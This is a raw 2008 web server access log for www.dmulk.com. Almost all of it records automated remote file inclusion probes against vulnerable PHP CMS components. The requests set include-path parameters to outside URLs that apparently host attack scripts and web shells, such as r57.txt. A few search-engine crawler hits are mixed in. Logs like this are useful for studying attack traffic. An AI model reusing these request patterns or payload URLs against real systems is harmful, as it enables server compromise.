58.227.193.211 - - [13/Jul/2008:09:00:06 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:09:00:06 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.122.200.198 - - [13/Jul/2008:09:00:37 -0700] "GET /logs///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.200.198 - - [13/Jul/2008:09:00:37 -0700] "GET ///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [13/Jul/2008:09:00:44 -0700] "GET /logs/access.log//errors.php?error=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:00:59 -0700] "GET /logs///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:00:59 -0700] "GET ///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.2.136 - - [13/Jul/2008:09:01:01 -0700] "GET /booth.php?include_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
61.47.2.136 - - [13/Jul/2008:09:01:05 -0700] "GET /logs/booth.php?include_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:01:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:01:37 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:09:01:57 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:09:01:58 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
205.234.198.151 - - [13/Jul/2008:09:02:37 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lynnliquormart.com/css/files/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.151 - - [13/Jul/2008:09:02:37 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lynnliquormart.com/css/files/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.67.24.222 - - [13/Jul/2008:09:02:59 -0700] "GET /logs//admin.php?include_path=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
80.67.24.222 - - [13/Jul/2008:09:02:59 -0700] "GET //admin.php?include_path=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
195.110.22.76 - - [13/Jul/2008:09:04:00 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.22.76 - - [13/Jul/2008:09:04:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.22.76 - - [13/Jul/2008:09:04:01 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:09:04:18 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:05:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:05:00 -0700] "GET //skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:05:33 -0700] "GET /logs/access_080128.log//admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:05:33 -0700] "GET //admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:05:33 -0700] "GET /logs//admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.240.146 - - [13/Jul/2008:09:05:44 -0700] "GET /stringhttp://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.53.240.146 - - [13/Jul/2008:09:05:44 -0700] "GET /logs/stringhttp://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
193.144.8.136 - - [13/Jul/2008:09:05:47 -0700] "GET /logs/access_080207.log//components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.144.8.136 - - [13/Jul/2008:09:05:48 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.144.8.136 - - [13/Jul/2008:09:05:48 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [13/Jul/2008:09:07:27 -0700] "GET //index.php?pagina=http://hscu.de/page/bilder/schult_a102.jpg?? HTTP/1.1" 200 18421 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:07:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:07:45 -0700] "GET //skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:09:07:47 -0700] "GET /logs/access.log/main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:09:07:47 -0700] "GET /logs/main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:09:07:48 -0700] "GET /main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:09:08:15 -0700] "GET /logs/main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:09:08:16 -0700] "GET /logs/access.log/main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:09:08:16 -0700] "GET /main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.144.8.136 - - [13/Jul/2008:09:08:31 -0700] "GET /logs/access_071224.log//components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:09:08:48 -0700] "GET /logs/index.php?option=com_simpleboardhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:09:08:50 -0700] "GET /index.php?option=com_simpleboardhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18461 "-" "libwww-perl/5.69" "www.dmulk.com"
194.114.145.73 - - [13/Jul/2008:09:08:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [13/Jul/2008:09:08:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.110.22.76 - - [13/Jul/2008:09:09:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.168.176.11 - - [13/Jul/2008:09:09:08 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lynnliquormart.com/css/files/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.168.176.11 - - [13/Jul/2008:09:09:08 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lynnliquormart.com/css/files/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.168.176.11 - - [13/Jul/2008:09:09:09 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lynnliquormart.com/css/files/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [13/Jul/2008:09:09:29 -0700] "GET /logs/access_080218.log/index.php?option=com_chronocontacthttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [13/Jul/2008:09:09:42 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [13/Jul/2008:09:09:43 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:09:47 -0700] "GET //admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:10:03 -0700] "GET ///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.198.103.110 - - [13/Jul/2008:09:11:18 -0700] "GET /logs/access_080207.log//components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.103.110 - - [13/Jul/2008:09:11:18 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.103.110 - - [13/Jul/2008:09:11:19 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.246.22.32 - - [13/Jul/2008:09:12:54 -0700] "GET /logs/access_080329.log//claroline/phpbb/page_tail.php?includePath=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [13/Jul/2008:09:12:55 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [13/Jul/2008:09:12:55 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [13/Jul/2008:09:13:16 -0700] "GET /logs/access_080218.log//claroline/phpbb/page_tail.php?includePath=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [13/Jul/2008:09:13:17 -0700] "GET /stringhttp://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.53.240.146 - - [13/Jul/2008:09:13:18 -0700] "GET /logs/stringhttp://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:13:48 -0700] "GET /logs/access_080112.log//admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:13:48 -0700] "GET //admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:13:48 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:13:49 -0700] "GET /logs//admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:13:49 -0700] "GET /logs/access_071224.log//admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:09:13:56 -0700] "GET /logs/access_080507.log/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:09:13:59 -0700] "GET /index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 200 18497 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:09:14:00 -0700] "GET /logs/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.150 - - [13/Jul/2008:09:14:22 -0700] "GET //admin/admin.php?vwar_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:09:15:45 -0700] "GET /logs/access_080329.log//claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:09:15:45 -0700] "GET /claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:09:15:46 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:15:52 -0700] "GET /logs/access_071130.log/main.html.php?seite=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:15:52 -0700] "GET /main.html.php?seite=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:15:52 -0700] "GET /logs/main.html.php?seite=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.29 - - [13/Jul/2008:09:16:15 -0700] "GET /bikes/dteel/140CANON/ HTTP/1.1" 200 987 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.246.22.32 - - [13/Jul/2008:09:16:21 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:16:25 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:16:26 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.32 - - [13/Jul/2008:09:16:26 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [13/Jul/2008:09:16:27 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [13/Jul/2008:09:16:27 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:09:16:31 -0700] "GET /logs/access_080330.log/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:09:16:38 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.200.198 - - [13/Jul/2008:09:18:12 -0700] "GET ///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:18:17 -0700] "GET ///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:09:18:59 -0700] "GET /logs/access_080218.log//claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:09:19:44 -0700] "GET /?S=A HTTP/1.0" 200 18257 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:19:47 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.29 - - [13/Jul/2008:09:19:47 -0700] "GET ///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.163.201 - - [13/Jul/2008:09:20:21 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.163.201 - - [13/Jul/2008:09:20:21 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:09:20:37 -0700] "GET /main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:09:20:37 -0700] "GET /logs/main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:09:20:38 -0700] "GET /logs/access.log/main.php?page=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:20:44 -0700] "GET /logs/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:20:44 -0700] "GET /components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [13/Jul/2008:09:20:48 -0700] "GET /logs/access.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:09:20:53 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:09:20:54 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.89 - - [13/Jul/2008:09:21:37 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [13/Jul/2008:09:21:39 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:21:42 -0700] "GET /logs/libs/geoip/DNS/RR.php?phpdns_basedir=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:21:42 -0700] "GET /libs/geoip/DNS/RR.php?phpdns_basedir=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:22:12 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:22:13 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:22:16 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:22:31 -0700] "GET /logs/access_080117.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.122.79.161 - - [13/Jul/2008:09:22:31 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.234.146 - - [13/Jul/2008:09:22:35 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [13/Jul/2008:09:22:35 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [13/Jul/2008:09:22:36 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.122.200.198 - - [13/Jul/2008:09:22:43 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.200.198 - - [13/Jul/2008:09:22:43 -0700] "GET ///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
